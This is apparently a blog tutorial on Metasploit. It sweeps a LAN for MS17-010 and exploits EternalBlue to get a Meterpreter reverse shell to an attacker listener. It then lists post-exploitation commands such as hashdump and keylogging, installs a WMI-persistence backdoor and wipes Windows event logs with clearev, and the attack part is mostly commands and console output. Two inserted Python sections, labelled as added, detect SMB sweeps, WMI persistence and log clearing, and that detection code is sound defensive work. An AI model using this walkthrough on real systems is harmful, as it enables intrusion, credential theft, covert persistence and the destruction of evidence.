
Common Metasploit modules: EternalBlue, persistence, clearing traces

EternalBlue scanner module: scan the LAN for hosts that have the EternalBlue (MS17-010) vulnerability

msf5 > search  eternalblue

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


msf5 > use  auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                               Required  Description
   ----         ---------------                                                               --------  -----------
   CHECK_ARCH   true                                                                          no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                                          no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                                         no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /home/testpoc/metasploit/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                                           yes       The SMB service port (TCP)
   SMBDomain    .                                                                             no        The Windows domain to use for authentication
   SMBPass                                                                                    no        The password for the specified username
   SMBUser                                                                                    no        The username to authenticate as
   THREADS      1                                                                             yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) >
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.*
RHOSTS => 192.168.1.*
msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 10
THREADS => 10
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 192.168.1.2:445       - An SMB Login Error occurred while connecting to the IPC$ tree.
[-] 192.168.1.16:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 192.168.1.*:445       - Scanned  33 of 256 hosts (12% complete)
[-] 192.168.1.40:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[-] 192.168.1.39:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[-] 192.168.1.48:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 192.168.1.*:445       - Scanned  52 of 256 hosts (20% complete)
[*] 192.168.1.*:445       - Scanned  78 of 256 hosts (30% complete)
[+] 192.168.1.78:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[+] 192.168.1.88:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[-] 192.168.1.96:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[+] 192.168.1.95:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[-] 192.168.1.100:445     - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 192.168.1.*:445       - Scanned 106 of 256 hosts (41% complete)
[+] 192.168.1.109:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Datacenter 9600 x64 (64-bit)
[-] 192.168.1.126:445     - An SMB Login Error occurred while connecting to the IPC$ tree.
[-] 192.168.1.124:445     - An SMB Login Error occurred while connecting to the IPC$ tree.
[+] 192.168.1.129:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.*:445       - Scanned 133 of 256 hosts (51% complete)

Hosts reported with "Host is likely VULNERABLE" are the machines that probably have the vulnerability.
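From the defender's side, a sweep like the one above (one source touching every 192.168.1.x host on 445 within seconds, successful or not) is easy to spot in connection logs. The Python below is an added example, not code from the post or from Metasploit; the log line format, the 60-second window and the threshold of 8 distinct hosts are assumptions made for the demo.

```python
"""SMB sweep detector: flag a source that touches many distinct hosts on TCP/445
within a short window. Added example, not code from the original post.
Log format is constructed for this demo: "<unix_ts> <src_ip> <dst_ip> <dst_port> <state>"."""
from collections import defaultdict, deque
from ipaddress import ip_address

SMB_PORT = 445
WINDOW_SECONDS = 60   # assumption: a sweep touches many hosts within a minute
HOST_THRESHOLD = 8    # assumption: 8 distinct SMB peers in a window is abnormal for a client

# Constructed sample log (not real traffic). 192.168.1.137 probes ten neighbours
# on 445 in ten seconds; rejected (REJ) and unanswered (S0) attempts still count,
# because a scanner's failed IPC$ logins are as telling as its successes.
SAMPLE_LOG = """\
1612337520 192.168.1.137 192.168.1.2 445 REJ
1612337521 192.168.1.137 192.168.1.3 445 S0
1612337522 192.168.1.137 192.168.1.5 445 S0
1612337523 192.168.1.137 192.168.1.16 445 REJ
1612337524 192.168.1.137 192.168.1.39 445 REJ
1612337525 192.168.1.137 192.168.1.40 445 REJ
1612337526 192.168.1.137 192.168.1.48 445 REJ
1612337527 192.168.1.137 192.168.1.78 445 SF
1612337528 192.168.1.137 192.168.1.88 445 SF
1612337529 192.168.1.137 192.168.1.95 445 SF
1612337530 192.168.1.50 192.168.1.10 445 SF
1612337590 192.168.1.50 192.168.1.10 445 SF
"""

def parse_line(line):
    """Split one constructed log line into (ts, src, dst, dport, state)."""
    ts, src, dst, dport, state = line.split()
    return int(ts), src, dst, int(dport), state

def detect_smb_sweeps(lines, window=WINDOW_SECONDS, threshold=HOST_THRESHOLD):
    """Return {src_ip: sorted distinct 445 targets} for sources exceeding the threshold."""
    recent = defaultdict(deque)   # src -> (ts, dst) pairs inside the sliding window
    alerts = defaultdict(set)
    for line in lines:
        if not line.strip():
            continue
        ts, src, dst, dport, _state = parse_line(line)
        if dport != SMB_PORT:
            continue
        q = recent[src]
        q.append((ts, dst))
        while ts - q[0][0] > window:   # expire pairs older than the window
            q.popleft()
        distinct = {d for _, d in q}
        if len(distinct) >= threshold:
            alerts[src].update(distinct)
    return {src: sorted(t, key=ip_address) for src, t in alerts.items()}
```

Running `detect_smb_sweeps(SAMPLE_LOG.splitlines())` flags only 192.168.1.137 with its ten targets; the file-server client 192.168.1.50 never exceeds one distinct peer.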

Exploiting EternalBlue

msf5 auxiliary(scanner/smb/smb_ms17_010) > use  exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set  RHOSTS 192.168.1.78
RHOSTS => 192.168.1.78
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.1.78     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.137    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.1.137:4444
[*] 192.168.1.78:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.78:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.78:445      - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.1.78:445 - Connecting to target for exploitation.
[+] 192.168.1.78:445 - Connection established for exploitation.
[+] 192.168.1.78:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.78:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.78:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.78:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.1.78:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 192.168.1.78:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.78:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.78:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.78:445 - Starting non-paged pool grooming
[+] 192.168.1.78:445 - Sending SMBv2 buffers
[+] 192.168.1.78:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.78:445 - Sending final SMBv2 buffers.
[*] 192.168.1.78:445 - Sending last fragment of exploit packet!
[*] 192.168.1.78:445 - Receiving response from exploit packet
[+] 192.168.1.78:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.78:445 - Sending egg to corrupted connection.
[*] 192.168.1.78:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.1.78
[*] Meterpreter session 1 opened (192.168.1.137:4444 -> 192.168.1.78:49595) at 2021-02-03 07:32:10 +0000
[+] 192.168.1.78:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.78:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.78:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >
# Session obtained successfully

Note: if the default payload is not this one, it is recommended to run set payload windows/x64/meterpreter/reverse_tcp to switch to it.

Common commands after obtaining a session:

help # list all available commands

getuid # show the user the session is running as

screenshot # take a screenshot

hashdump # dump password hashes

ps # list processes

sysinfo # show system information

route # show the routing table

getpid # show the PID of the process the session is running in

migrate # migrate the current session into another process

keyscan_start # start keystroke logging

keyscan_dump # show captured keystrokes. A session obtained through EternalBlue cannot log keystrokes by default; after migrating into another process, for example notepad.exe, it can.

download/upload # download or upload files

keyscan_stop # stop keystroke logging

bg # background the session and return to the msfconsole prompt

After running some commands, use bg to return to the main console. The sessions command shows that one session exists, and sessions 1 enters it again.

Once access has been obtained, the next step is to leave a backdoor; search persistence lists the relevant modules.

msf5 exploit(windows/smb/ms17_010_eternalblue) > search persis

Matching Modules
================

   #   Name                                                        Disclosure Date  Rank       Check  Description
   -   ----                                                        ---------------  ----       -----  -----------
   0   auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss  2015-04-08       normal     No     Arris / Motorola Surfboard SBG6580 Web Interface Takeover
   1   auxiliary/scanner/http/lucky_punch                                           normal     No     HTTP Microsoft SQL Injection Table XSS Infection
   2   auxiliary/server/regsvr32_command_delivery_server                            normal     No     Regsvr32.exe (.sct) Command Delivery Server
   3   exploit/android/browser/webview_addjavascriptinterface      2012-12-21       excellent  No     Android Browser and WebView addJavascriptInterface Code Execution
   4   exploit/linux/http/ubiquiti_airos_file_upload               2016-02-13       excellent  No     Ubiquiti airOS Arbitrary File Upload
   5   exploit/linux/local/apt_package_manager_persistence         1999-03-09       excellent  No     APT Package Manager Persistence
   6   exploit/linux/local/autostart_persistence                   2006-02-13       excellent  No     Autostart Desktop Item Persistence
   7   exploit/linux/local/bash_profile_persistence                1989-06-08       normal     No     Bash Profile Persistence
   8   exploit/linux/local/cron_persistence                        1979-07-01       excellent  No     Cron Persistence
   9   exploit/linux/local/rc_local_persistence                    1980-10-01       excellent  No     rc.local Persistence
   10  exploit/linux/local/service_persistence                     1983-01-01       excellent  No     Service Persistence
   11  exploit/linux/local/yum_package_manager_persistence         2003-12-17       excellent  No     Yum Package Manager Persistence
   12  exploit/multi/misc/persistent_hpca_radexec_exec             2014-01-02       great      Yes    HP Client Automation Command Injection
   13  exploit/osx/local/persistence                               2012-04-01       excellent  No     Mac OS X Persistent Payload Installer
   14  exploit/osx/local/sudo_password_bypass                      2013-02-28       normal     Yes    Mac OS X Sudo Password Bypass
   15  exploit/unix/local/at_persistence                           1997-01-01       excellent  Yes    at(1) Persistence
   16  exploit/windows/browser/ms10_018_ie_behaviors               2010-03-09       good       No     MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
   17  exploit/windows/local/persistence                           2011-10-19       excellent  No     Windows Persistent Registry Startup Payload Installer
   18  exploit/windows/local/persistence_image_exec_options        2008-06-28       excellent  No     Windows Silent Process Exit Persistence
   19  exploit/windows/local/persistence_service                   2018-10-20       excellent  No     Windows Persistent Service Installer
   20  exploit/windows/local/ps_persist                            2012-08-14       excellent  No     Powershell Payload Execution
   21  exploit/windows/local/ps_wmi_exec                           2012-08-19       excellent  No     Authenticated WMI Exec via Powershell
   22  exploit/windows/local/registry_persistence                  2015-07-01       excellent  Yes    Windows Registry Only Persistence
   23  exploit/windows/local/s4u_persistence                       2013-01-02       excellent  No     Windows Manage User Level Persistent Payload Installer
   24  exploit/windows/local/vss_persistence                       2011-10-21       excellent  No     Persistent Payload in Windows Volume Shadow Copy
   25  exploit/windows/local/wmi_persistence                       2017-06-06       normal     No     WMI Event Subscription Persistence
   26  exploit/windows/smb/psexec_psh                              1999-01-01       manual     No     Microsoft Windows Authenticated Powershell Command Execution
   27  payload/cmd/unix/bind_inetd                                                  normal     No     Unix Command Shell, Bind TCP (inetd)
   28  payload/cmd/windows/bind_perl                                                normal     No     Windows Command Shell, Bind TCP (via Perl)
   29  payload/cmd/windows/bind_perl_ipv6                                           normal     No     Windows Command Shell, Bind TCP (via perl) IPv6
   30  payload/php/bind_perl                                                        normal     No     PHP Command Shell, Bind TCP (via Perl)
   31  payload/php/bind_perl_ipv6                                                   normal     No     PHP Command Shell, Bind TCP (via perl) IPv6
   32  post/linux/manage/sshkey_persistence                                         excellent  No     SSH Key Persistence
   33  post/windows/gather/enum_ad_managedby_groups                                 normal     No     Windows Gather Active Directory Managed Groups
   34  post/windows/manage/install_ssh                                              normal     No     Install OpenSSH for Windows
   35  post/windows/manage/persistence_exe                                          normal     No     Windows Manage Persistent EXE Payload Installer
   36  post/windows/manage/portproxy                                                normal     No     Windows Manage Set Port Forwarding With PortProxy
   37  post/windows/manage/sshkey_persistence                                       good       No     SSH Key Persistence
   38  post/windows/manage/sticky_keys                                              normal     No     Sticky Keys Persistance Module

Then pick whichever one you like to leave the backdoor.

Note: on Windows, choose the modules whose names start with exploit/windows/local

For example:

msf5 exploit(windows/local/ps_wmi_exec) > use exploit/windows/local/wmi_persistence
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/wmi_persistence) > show options

Module options (exploit/windows/local/wmi_persistence):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   CALLBACK_INTERVAL   1800000          yes       Time between callbacks (In milliseconds). (Default: 1800000).
   CLASSNAME           UPDATER          yes       WMI event class name. (Default: UPDATER)
   EVENT_ID_TRIGGER    4625             yes       Event ID to trigger the payload. (Default: 4625)
   PERSISTENCE_METHOD  EVENT            yes       Method to trigger the payload. (Accepted: EVENT, INTERVAL, LOGON, PROCESS, WAITFOR)
   PROCESS_TRIGGER     CALC.EXE         yes       The process name to trigger the payload. (Default: CALC.EXE)
   SESSION                              yes       The session to run this module on.
   USERNAME_TRIGGER    BOB              yes       The username to trigger the payload. (Default: BOB)
   WAITFOR_TRIGGER     CALL             yes       The word to trigger the payload. (Default: CALL)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.137    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf5 exploit(windows/local/wmi_persistence) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/wmi_persistence) > run

After leaving the backdoor, remember to clean up traces.

Use sessions 1 to enter the session.

Use clearev to clear traces (it wipes the Windows event logs).
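Both of the last two steps leave telemetry a defender can hunt for: the wmi_persistence module above (default CLASSNAME UPDATER, EVENT_ID_TRIGGER 4625) creates a WMI filter, consumer and binding that Sysmon records as events 19, 20 and 21, and clearev produces Security event 1102 and System event 104 when the logs are wiped. The Python below is an added example, not code from the post or from Metasploit; the record shape, the consumer command line and the filter query are constructed assumptions about what such a subscription looks like.

```python
"""Hunt for the two artifacts the post's last steps leave behind: a WMI
event-subscription backdoor (wmi_persistence) and cleared event logs (clearev).
Added example, not from the original post; records are constructed dicts in a
simplified Sysmon / Windows-event shape, not real telemetry."""
import re

WMI_FILTER, WMI_CONSUMER, WMI_BINDING = 19, 20, 21   # Sysmon WMI activity events
AUDIT_LOG_CLEARED, LOG_CLEARED = 1102, 104           # Security / System+Application log cleared
# Assumptions: the launcher is a CommandLineEventConsumer running hidden or encoded
# PowerShell, and the EVENT method's filter watches Win32_NTLogEvent for EventCode 4625.
SUSPICIOUS_CMD = re.compile(r"powershell.*(-enc|-w\s*hidden|-nop)", re.I)
LOGON_FAIL_QUERY = re.compile(r"Win32_NTLogEvent.*EventCode\s*=\s*'?4625", re.I)

SAMPLE_EVENTS = [  # constructed, in the order a host would log them
    {"id": WMI_FILTER, "host": "WS-78", "Name": "UPDATER", "Query":
     "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA "
     "'Win32_NTLogEvent' AND TargetInstance.EventCode = '4625'"},
    {"id": WMI_CONSUMER, "host": "WS-78", "Name": "UPDATER", "Type": "Command Line",
     "Destination": "powershell.exe -nop -w hidden -enc <base64 placeholder>"},
    {"id": WMI_BINDING, "host": "WS-78", "Consumer": 'CommandLineEventConsumer.Name="UPDATER"',
     "Filter": '__EventFilter.Name="UPDATER"'},
    {"id": WMI_FILTER, "host": "WS-78", "Name": "SCM Event Log Filter",  # benign, unbound
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"id": AUDIT_LOG_CLEARED, "host": "WS-78", "SubjectUserName": "SYSTEM"},
    {"id": LOG_CLEARED, "host": "WS-78", "Channel": "System"},
]

def _name(ref):
    """'__EventFilter.Name="UPDATER"' -> 'UPDATER'."""
    return re.search(r'Name="([^"]+)"', ref).group(1)

def find_wmi_persistence(events):
    """Walk bindings to their filter and consumer; return (host, filter, consumer, reasons)."""
    filters = {e["Name"]: e for e in events if e["id"] == WMI_FILTER}
    consumers = {e["Name"]: e for e in events if e["id"] == WMI_CONSUMER}
    findings = []
    for e in (x for x in events if x["id"] == WMI_BINDING):
        f, c = filters.get(_name(e["Filter"])), consumers.get(_name(e["Consumer"]))
        if c is None or c.get("Type") != "Command Line":
            continue
        reasons = []
        if SUSPICIOUS_CMD.search(c["Destination"]):
            reasons.append("consumer launches hidden/encoded PowerShell")
        if f and LOGON_FAIL_QUERY.search(f["Query"]):
            reasons.append("filter fires on every failed logon (4625)")
        if reasons:
            findings.append((e["host"], f["Name"] if f else "?", c["Name"], reasons))
    return findings

def find_log_clearing(events):
    """Return (host, channel, actor) for each 'log cleared' record."""
    return [(e["host"], e.get("Channel", "Security"), e.get("SubjectUserName", "?"))
            for e in events if e["id"] in (AUDIT_LOG_CLEARED, LOG_CLEARED)]
```

On the sample, the UPDATER binding is reported with both reasons while the unbound built-in SCM filter is ignored, and the two log-cleared records show the Security and System logs being wiped in sequence, which is exactly the pattern clearev produces.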

posted @ 2021-02-03 15:44  skycandy